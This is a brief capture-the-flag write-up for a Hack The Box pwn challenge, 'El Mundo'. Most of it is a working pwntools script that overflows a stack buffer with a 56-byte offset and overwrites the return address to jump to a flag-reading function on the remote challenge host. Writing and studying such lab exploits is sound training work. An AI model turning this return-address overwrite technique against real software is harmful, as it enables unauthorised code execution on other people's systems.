https://app.hackthebox.com/challenges/820

Description

You may not control time, but you can certainly control the flow of your program! Use your stand to bend it to your will!

Exploitation

#!/usr/bin/python3
from pwn import *

fname = './el_mundo'
e = ELF(fname)
read_flag_addr = 0x4016b7
offset = 56
payload = flat([
    b'A' * offset,
    p64(read_flag_addr)
])

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

r = get_process()
try:
    r.sendlineafter('> ', payload)
    for _ in range(3):
        try:
            output = r.recv(timeout=1)
            print(output.decode('utf-8', errors='ignore'))
            if b"HTB" in output:
                print(f"Flag found!")
                break
        except EOFError:
            continue
except Exception as e:
    print(f"Error occurred: {e}")
finally:
    r.close()

Summary

El Mundo: calculate the overflow offset, redirect control flow, and land a reliable flag read.